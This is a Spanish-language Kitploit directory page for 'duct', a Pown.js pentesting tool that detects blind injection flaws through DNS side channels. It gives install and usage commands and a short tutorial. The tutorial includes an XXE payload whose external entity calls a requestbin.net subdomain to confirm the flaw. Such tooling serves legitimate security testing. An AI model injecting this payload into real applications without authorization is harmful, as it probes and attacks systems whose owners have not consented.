Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
duct — Herramienta esencial para encontrar ataques de inyección ciega. | Kitploit
Herramientas/GitHubGitHub/pownjs/duct
Explotación de Aplicaciones WebRecopilación de InformaciónAnálisis de DNS
GitHubpownjs/duct

duct

Herramienta esencial para encontrar ataques de inyección ciega.

Ver Repositorio
49133hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Follow on Twitter NPM Fury

Pown Duct

Herramienta esencial para encontrar ataques de inyección ciega utilizando canales laterales de DNS.

Créditos

Esta herramienta forma parte de la iniciativa de código abierto de secapps.com.

root@kitploit:~
  ___ ___ ___   _   ___ ___  ___
 / __| __/ __| /_\ | _ \ _ \/ __|
 \__ \ _| (__ / _ \|  _/  _/\__ \
 |___/___\___/_/ \_\_| |_|  |___/
  https://secapps.com

NB: Esta herramienta aprovecha el servicio http://requestbin.net. Versiones futuras utilizarán una infraestructura dedicada y personalizada.

Inicio rápido

Esta herramienta está diseñada para usarse como parte de Pown.js, pero también se puede invocar de forma independiente.

Primero, instala Pown como de costumbre:

root@kitploit:~
$ npm install -g pown@latest
Descargar herramienta

Invoca directamente desde Pown:

root@kitploit:~
$ pown duct

De lo contrario, instala este módulo localmente desde la raíz de tu proyecto:

root@kitploit:~
$ npm install @pown/duct --save

Una vez hecho esto, invoca la CLI de pown:

root@kitploit:~
$ ./node_modules/.bin/pown-cli duct

También puedes usar el pown global para invocar la herramienta localmente:

root@kitploit:~
$ POWN_ROOT=. pown duct

Uso

root@kitploit:~
pown duct <command>

Habilitador de ataques de canal lateral

Commands:
  pown duct dns  Ducting de DNS

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown duct dns

root@kitploit:~
pown duct dns

Ducting de DNS

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]
  --channel  Restaurar canal  [string]
  --output   Formato de salida  [string] [choices: "string", "hexdump", "json"] [default: "string"]

Tutorial

Hay casos en los que necesitamos realizar un ataque como inyección SQL, XSS, XXE o SSRF, pero la aplicación objetivo no proporciona ninguna indicación de que sea vulnerable. Una forma de asegurarse de si una vulnerabilidad está presente es intentar inyectar un vector de ataque válido que obligue a un resolvedor DNS a preguntar por un dominio controlado. Si la resolución es exitosa, el ataque se considerará exitoso.

NOTA: Es posible que estés familiarizado con Burp Collaborator, que proporciona un servicio similar para clientes.

Primero, necesitamos un nombre DNS desechable para resolver:

root@kitploit:~
$ pown duct dns

captura de pantalla

Usando el DNS proporcionado, compón tu payload. Por ejemplo, lo siguiente podría desencadenar una resolución DNS si existe una vulnerabilidad XXE.

root@kitploit:~
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>

Si el ataque fue exitoso, recibiremos un mensaje en la terminal.

captura de pantalla